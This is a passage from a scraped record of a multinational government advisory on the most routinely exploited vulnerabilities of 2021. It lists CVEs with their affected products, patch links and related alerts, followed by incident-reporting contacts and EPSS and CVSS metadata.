CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>)\n\n| \n\n[Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>)\n\n| \n\nJoint CSA [Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and \u201cPrintNightmare\u201d Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>)\n\nCCCS [Alert Windows Print Spooler Vulnerability Remains Unpatched \u2013 Update 3](<https://www.cyber.gc.ca/en/alerts/windows-print-spooler-vulnerability-remains-unpatched>) \n \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n| \n\nMicrosoft \n\n| \n\nMicrosoft Exchange Server 2013 Cumulative Update 23\n\nMicrosoft Exchange Server 2016 Cumulative Updates 19 and 20\n\nMicrosoft Exchange Server 2019 Cumulative Updates 8 and 9\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>)\n\n| \n\nJoint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>)\n\nACSC Alert [Microsoft Exchange ProxyShell Targeting in Australia](<https://www.cyber.gov.au/acsc/view-all-content/alerts/microsoft-exchange-proxyshell-targeting-australia>) \n \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple Exchange Server versions; see: [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>) \n \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple Exchange Server versions; see [Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>)\n\n| \n\n[Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>) \n \n[CVE-2021-3156](<https://nvd.nist.gov/vuln/detail/CVE-2021-3156>)\n\n| \n\nSudo\n\n| \n\nSudo before 1.9.5p2\n\n| \n\n[Sudo Stable Release 1.9.5p2](<https://www.sudo.ws/releases/stable/#1.9.5p2>)\n\n| \n \n[CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>)\n\n| \n\nCheckbox Survey\n\n| \n\nCheckbox Survey versions prior to 7\n\n| \n\n| \n \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nMultiple versions; see: [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>)\n\n| \n\nCISA Alert: [Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-062a>)\n\nACSC Advisory [Active exploitation of Vulnerable Microsoft Exchange servers](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2021-002-active-exploitation-vulnerable-microsoft-exchange-servers>)\n\nCCCS Alert [Active Exploitation of Microsoft Exchange Vulnerabilities - Update 4](<https://www.cyber.gc.ca/en/alerts/active-exploitation-microsoft-exchange-vulnerabilities>) \n \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)\n\n| \n\nMicrosoft \n\n| \n\nExchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>) \n \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)\n\n| \n\nMicrosoft \n\n| \n\nExchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>) \n \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)\n\n| \n\nMicrosoft \n\n| \n\nExchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>) \n \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)\n\n| \n\nJira Atlassian \n\n| \n\nConfluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n| \n\n[Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>)\n\n| \n\nACSC Alert [Remote code execution vulnerability present in certain versions of Atlassian Confluence](<https://www.cyber.gov.au/acsc/view-all-content/alerts/remote-code-execution-vulnerability-present-certain-versions-atlassian-confluence>)\n\nCCCS [Atlassian Security Advisory](<https://www.cyber.gc.ca/en/alerts/atlassian-security-advisory>) \n \n[CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>)\n\n| \n\nPulse Secure \n\n| \n\nPCS 9.0R3/9.1R1 and Higher\n\n| \n\n[Pulse Secure SA44784 - 2021-04: Out-of-Cycle Advisory: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>)\n\n| \n\nCCCS Alert [Active Exploitation of Pulse Connect Secure Vulnerabilities - Update 1](<https://www.cyber.gc.ca/en/alerts/active-exploitation-pulse-connect-secure-vulnerabilities>) \n \n[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016>)\n\n| \n\nSonicWall \n\n| \n\nSMA 100 devices (SMA 200, SMA 210, SMA 400, SMA 410, SMA 500v)\n\n| \n\n[SonicWall Security Advisory SNWLID-2021-0001](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0001>)\n\n| \n \n[CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>)\n\n| \n\nMicrosoft\n\n| \n\nMultiple Windows products; see [Microsoft Security Update Guide Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>)\n\n| \n\n[Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>)\n\n| \n\nCCCS [Alert Windows Print Spooler Vulnerability Remains Unpatched \u2013 Update 3](<https://www.cyber.gc.ca/en/alerts/windows-print-spooler-vulnerability-remains-unpatched>) \n \n[CVE-2020-2509](<https://nvd.nist.gov/vuln/detail/CVE-2020-2509>)\n\n| \n\nQNAP \n\n| \n\nQTS, multiple versions; see [QNAP: Command Injection Vulnerability in QTS and QuTS hero](<https://www.qnap.com/en/security-advisory/qsa-21-05>)\n\nQuTS hero h4.5.1.1491 build 20201119 and later\n\n| \n\n[QNAP: Command Injection Vulnerability in QTS and QuTS hero](<https://www.qnap.com/en/security-advisory/qsa-21-05>)\n\n| \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\n\n| \n\nMicrosoft \n\n| \n\nWindows Server, multiple versions; see [Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>)\n\n| \n\n[Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>)\n\n| \n\nACSC Alert [Netlogon elevation of privilege vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/acsc/view-all-content/alerts/netlogon-elevation-privilege-vulnerability-cve-2020-1472>)\n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nCCCS Alert [Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 1](<https://www.cyber.gc.ca/en/alerts/microsoft-netlogon-elevation-privilege-vulnerability-cve-2020-1472>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\nMicrosoft \n\n| \n\nExchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)\n\n| \n\nCISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>)\n\nJoint CSA [Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>)\n\nCCCS Alert [Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://www.cyber.gc.ca/en/alerts/microsoft-exchange-validation-key-remote-code-execution-vulnerability>) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\nCitrix \n\n| \n\nADC and Gateway version 13.0 all supported builds before 13.0.47.24\n\nNetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12\n\nSD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b\n\n| \n\n[Citrix Security Bulletin CTX267027](<https://support.citrix.com/article/CTX267027>)\n\n| \n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nCISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>)\n\nCCCS Alert [Detecting Compromises relating to Citrix CVE-2019-19781](<https://www.cyber.gc.ca/en/alerts/detecting-compromises-relating-citrix-cve-2019-19781-0>) \n \n[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>)\n\n| \n\nProgress Telerik \n\n| \n\nUI for ASP.NET AJAX through 2019.3.1023\n\n| \n\n[Telerik UI for ASP.NET AJAX Allows JavaScriptSerializer Deserialization](<https://docs.telerik.com/devtools/aspnet-ajax/knowledge-base/common-allows-javascriptserializer-deserialization>)\n\n| \n\nACSC Alert [Active exploitation of vulnerability in Microsoft Internet Information Services](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerability-microsoft-internet-information-services>) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\nPulse Secure \n\n| \n\nPulse Connect Secure 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\n\n| \n\n[Pulse Secure: SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n| \n\nCISA Alert [Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa20-010a>)\n\nCISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>)\n\nACSC Advisory [Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2019-129-recommendations-mitigate-vulnerability-pulse-connect-secure-vpn-software>)\n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nCCCS [Alert APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi>) \n \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n\n| \n\nFortinet\n\n| \n\nFortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6\n\n| \n\n[Fortinet FortiGuard Labs: FG-IR-20-233](<https://www.fortiguard.com/psirt/FG-IR-20-233>)\n\n| \n\nJoint CSA [Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>)\n\nJoint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>)\n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nACSC Alert [APT exploitation of Fortinet Vulnerabilities](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)\n\nCCCS Alert [Exploitation of Fortinet FortiOS vulnerabilities (CISA, FBI) - Update 1](<https://www.cyber.gc.ca/en/alerts/exploitation-fortinet-fortios-vulnerabilities-cisa-fbi>) \n \n[CVE-2018-0171](<https://nvd.nist.gov/vuln/detail/CVE-2018-0171>)\n\n| \n\nCisco \n\n| \n\nSee [Cisco Security Advisory: cisco-sa-20180328-smi2](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed>)\n\n| \n\n[Cisco Security Advisory: cisco-sa-20180328-smi2](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed>)\n\n| \n\nCCCS [Action Required to Secure the Cisco IOS and IOS XE Smart Install Feature](<https://www.cyber.gc.ca/en/alerts/action-required-secure-cisco-ios-and-ios-xe-smart-install-feature>) \n \n[CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)\n\n| \n\nMicrosoft \n\n| \n\nOffice, multiple versions; see [Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>)\n\n| \n\nCCCS Alert [Microsoft Office Security Update](<https://www.cyber.gc.ca/en/alerts/microsoft-office-security-update>) \n \n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple products; see [Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>)\n\n| \n\nCCCS [Microsoft Security Updates](<https://www.cyber.gc.ca/en/alerts/microsoft-security-updates>) \n \n### Contact Information\n\n**U.S. organizations: **all organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at [report@cisa.gov ](<mailto:report@cisa.gov>)or (888) 282-0870 and/or to the FBI via your [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>) or the FBI\u2019s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>). **Australian organizations:** visit [cyber.gov.au](<https://www.cyber.gov.au/>) or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. **Canadian organizations:** report incidents by emailing CCCS at [contact@cyber.gc.ca](<mailto:contact@cyber.gc.ca>). **New Zealand organizations:** report cyber security incidents to [incidents@ncsc.govt.nz](<mailto:incidents@ncsc.govt.nz>) or call 04 498 7654. **United Kingdom organizations:** report a significant cyber security incident: [ncsc.gov.uk/report-an-incident](<https://www.ncsc.gov.uk/section/about-this-website/contact-us>) (monitored 24 hours) or, for urgent assistance, call 03000 200 973.\n\n### Revisions\n\nApril 27, 2022: Initial Version\n", "published": "2022-04-28T12:00:00", "modified": "2022-04-28T12:00:00", "epss": [{"cve": "CVE-2017-0199", "epss": 0.97445, "percentile": 0.99917, "modified": "2023-09-21"}, {"cve": "CVE-2017-11882", "epss": 0.97464, "percentile": 0.99933, "modified": "2023-09-20"}, {"cve": "CVE-2018-0171", "epss": 0.85039, "percentile": 0.98113, "modified": "2023-09-21"}, {"cve": "CVE-2018-13379", "epss": 0.97491, "percentile": 0.99954, "modified": "2023-06-23"}, {"cve": "CVE-2019-11510", "epss": 0.97334, "percentile": 0.99806, "modified": "2023-06-13"}, {"cve": "CVE-2019-18935", "epss": 0.90831, "percentile": 0.98349, "modified": "2023-06-13"}, {"cve": "CVE-2019-19781", "epss": 0.97475, "percentile": 0.99939, "modified": "2023-06-13"}, {"cve": "CVE-2020-0688", "epss": 0.97274, "percentile": 0.99754, "modified": "2023-06-05"}, {"cve": "CVE-2020-1472", "epss": 0.9732, "percentile": 0.9979, "modified": "2023-06-06"}, {"cve": "CVE-2020-2509", "epss": 0.00179, "percentile": 0.53708, "modified": "2023-06-06"}, {"cve": "CVE-2021-1675", "epss": 0.9612, "percentile": 0.99266, "modified": "2023-08-06"}, {"cve": "CVE-2021-20016", "epss": 0.02879, "percentile": 0.89244, "modified": "2023-05-27"}, {"cve": "CVE-2021-20038", "epss": 0.93313, "percentile": 0.98605, "modified": "2023-05-27"}, {"cve": "CVE-2021-21972", "epss": 0.97466, "percentile": 0.99929, "modified": "2023-05-27"}, {"cve": "CVE-2021-21985", "epss": 0.9748, "percentile": 0.9994, "modified": "2023-05-27"}, {"cve": "CVE-2021-22893", "epss": 0.96915, "percentile": 0.99542, "modified": "2023-05-27"}, {"cve": "CVE-2021-26084", "epss": 0.97488, "percentile": 0.99947, "modified": "2023-05-27"}, {"cve": "CVE-2021-26855", "epss": 0.97534, "percentile": 0.99983, "modified": "2023-05-27"}, {"cve": "CVE-2021-26857", "epss": 0.42647, "percentile": 0.96776, "modified": "2023-05-27"}, {"cve": "CVE-2021-26858", "epss": 0.45994, "percentile": 0.96865, "modified": "2023-05-27"}, {"cve": "CVE-2021-27065", "epss": 0.92531, "percentile": 0.98484, "modified": "2023-05-27"}, {"cve": "CVE-2021-27101", "epss": 0.00785, "percentile": 0.78947, "modified": "2023-05-27"}, {"cve": "CVE-2021-27102", "epss": 0.00083, "percentile": 0.33976, "modified": "2023-05-27"}, {"cve": "CVE-2021-27103", "epss": 0.01096, "percentile": 0.82315, "modified": "2023-05-27"}, {"cve": "CVE-2021-27104", "epss": 0.00819, "percentile": 0.79448, "modified": "2023-05-27"}, {"cve": "CVE-2021-27852", "epss": 0.01035, "percentile": 0.81742, "modified": "2023-05-27"}, {"cve": "CVE-2021-31207", "epss": 0.97191, "percentile": 0.99712, "modified": "2023-08-06"}, {"cve": "CVE-2021-3156", "epss": 0.94196, "percentile": 0.98741, "modified": "2023-05-27"}, {"cve": "CVE-2021-34473", "epss": 0.97322, "percentile": 0.99787, "modified": "2023-05-23"}, {"cve": "CVE-2021-34523", "epss": 0.97467, "percentile": 0.9993, "modified": "2023-05-23"}, {"cve": "CVE-2021-34527", "epss": 0.97084, "percentile": 0.99623, "modified": "2023-05-23"}, {"cve": "CVE-2021-35464", "epss": 0.97394, "percentile": 0.99855, "modified": "2023-05-23"}, {"cve": "CVE-2021-40444", "epss": 0.97028, "percentile": 0.9959, "modified": "2023-05-23"}, {"cve": "CVE-2021-40539", "epss": 0.97519, "percentile": 0.99972, "modified": "2023-05-23"}, {"cve": "CVE-2021-42237", "epss": 0.97546, "percentile": 0.9999, "modified": "2023-05-23"}, {"cve": "CVE-2021-44228", "epss": 0.97565, "percentile": 0.99997, "modified": "2023-05-23"}, {"cve": "CVE-2022-42475", "epss": 0.42232, "percentile": 0.96784, "modified": "2023-06-03"}, {"cve": "CVE-2022-47966", "epss": 0.97445, "percentile": 0.99916, "modified": "2023-09-19"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": true, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://www.facebook.com/sharer/sharer.php?u=https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a&title=2021%20Top%20Routinely%20Exploited%20Vulnerabilities", "https://twitter.com/intent/tweet?text=2021%20Top%20Routinely%20Exploited%20Vulnerabilities+https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a", "https://www.linkedin.com/sharing/share-offsite/?url=https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a", "mailto:?subject=2021%20Top%20Routinely%20Exploited%20Vulnerabilities&body=https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a", "https://www.cisa.gov/", "https://www.nsa.gov/Cybersecurity/", "https://www.fbi.gov/investigate/cyber", "https://www.cyber.gov.au/", "https://www.cyber.gc.ca/en/", "https://www.gcsb.govt.nz/", "https://www.ncsc.gov.uk/", "https://www.cisa.gov/uscert/ncas/alerts/aa21-209a", "https://www.cisa.gov/uscert/ncas/alerts/aa21-209a", "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "https://nvd.nist.gov/vuln/detail/CVE-2021-40539", "https://nvd.nist.gov/vuln/detail/CVE-2021-34523", "https://nvd.nist.gov/vuln/detail/CVE-2021-34473", "https://nvd.nist.gov/vuln/detail/CVE-2021-31207", "https://nvd.nist.gov/vuln/detail/CVE-2021-27065", "https://nvd.nist.gov/vuln/detail/CVE-2021-26858", "https://nvd.nist.gov/vuln/detail/CVE-2021-26857", "https://nvd.nist.gov/vuln/detail/CVE-2021-26855", "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", "https://nvd.nist.gov/vuln/detail/CVE-2021-21972", "https://nvd.nist.gov/vuln/detail/CVE-2020-1472", "https://nvd.nist.gov/vuln/detail/CVE-2020-0688", "https://nvd.nist.gov/vuln/detail/CVE-2019-11510", "https://nvd.nist.gov/vuln/detail/CVE-2018-13379", "https://www.cisa.gov/uscert/ncas/alerts/aa21-209a", "https://nvd.nist.gov/vuln/detail/CVE-2021-42237", "https://nvd.nist.gov/vuln/detail/CVE-2021-35464", "https://nvd.nist.gov/vuln/detail/CVE-2021-27104", "https://nvd.nist.gov/vuln/detail/CVE-2021-27103", "https://nvd.nist.gov/vuln/detail/CVE-2021-27102", "https://nvd.nist.gov/vuln/detail/CVE-2021-27101", "https://nvd.nist.gov/vuln/detail/CVE-2021-21985", "https://nvd.nist.gov/vuln/detail/CVE-2021-20038", "https://nvd.nist.gov/vuln/detail/CVE-2021-40444", "https://nvd.nist.gov/vuln/detail/CVE-2021-34527", "https://nvd.nist.gov/vuln/detail/CVE-2021-3156", "https://nvd.nist.gov/vuln/detail/CVE-2021-27852", "https://nvd.nist.gov/vuln/detail/CVE-2021-22893", "https://nvd.nist.gov/vuln/detail/CVE-2021-20016", "https://nvd.nist.gov/vuln/detail/CVE-2021-1675", "https://nvd.nist.gov/vuln/detail/CVE-2020-2509", "https://nvd.nist.gov/vuln/detail/CVE-2019-19781", "https://nvd.nist.gov/vuln/detail/CVE-2019-18935", "https://nvd.nist.gov/vuln/detail/CVE-2018-0171", "https://nvd.nist.gov/vuln/detail/CVE-2017-11882", "https://nvd.nist.gov/vuln/detail/CVE-2017-0199", "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "https://cisa.gov/sites/default/files/publications/cisa-insights_risk-considerations-for-msp-customers_508.pdf", "https://cisa.gov/sites/default/files/publications/CISA%20Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf", "https://www.cyber.gov.au/acsc/view-all-content/publications/how-manage-your-security-when-engaging-managed-service-provider", "https://cisa.gov/sites/default/files/publications/CISA_CEG_Implementing_Strong_Authentication_508_1.pdf", "https://www.cyber.gov.au/acsc/view-all-content/publications/implementing-multi-factor-authentication", "https://www.cisa.gov/uscert/ncas/alerts/aa21-209a", "https://www.cisa.gov/uscert/ncas/alerts/aa20-133a", "https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance", "https://nvd.nist.gov/vuln/detail/CVE-2021-42237", "https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776#HistoryOfUpdates", "https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerable-sitecore-experience-platform-content-management-systems", "https://nvd.nist.gov/vuln/detail/CVE-2021-35464", "https://backstage.forgerock.com/knowledge/kb/article/a47894244", "https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2021-004-active-exploitation-forgerock-access-manager-openam-servers", "https://www.cyber.gc.ca/en/alerts/forgerock-security-advisory", "https://nvd.nist.gov/vuln/detail/CVE-2021-27104", "https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/", "https://www.cisa.gov/uscert/ncas/alerts/aa21-055a", "https://www.cyber.gov.au/acsc/view-all-content/alerts/potential-accellion-file-transfer-appliance-compromise", "https://nvd.nist.gov/vuln/detail/CVE-2021-27103", "https://nvd.nist.gov/vuln/detail/CVE-2021-27102", "https://nvd.nist.gov/vuln/detail/CVE-2021-27101", "https://nvd.nist.gov/vuln/detail/CVE-2021-21985", "https://www.vmware.com/security/advisories/VMSA-2021-0010.html", "https://www.cyber.gc.ca/en/alerts/vmware-security-advisory-41", "https://nvd.nist.gov/vuln/detail/CVE-2021-21972", "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", "https://www.cyber.gov.au/acsc/view-all-content/alerts/vmware-vcenter-server-plugin-remote-code-execution-vulnerability-cve-2021-21972", "https://www.cyber.gc.ca/en/alerts/vmware-security-advisory-35", "https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi", "https://nvd.nist.gov/vuln/detail/CVE-2021-20038", "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026", "https://www.cyber.gov.au/acsc/view-all-content/alerts/remote-code-execution-vulnerability-present-sonicwall-sma-100-series-appliances", "https://www.cyber.gc.ca/en/alerts/sonicwall-security-advisory-4", "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "https://github.com/cisagov/log4j-affected-db", 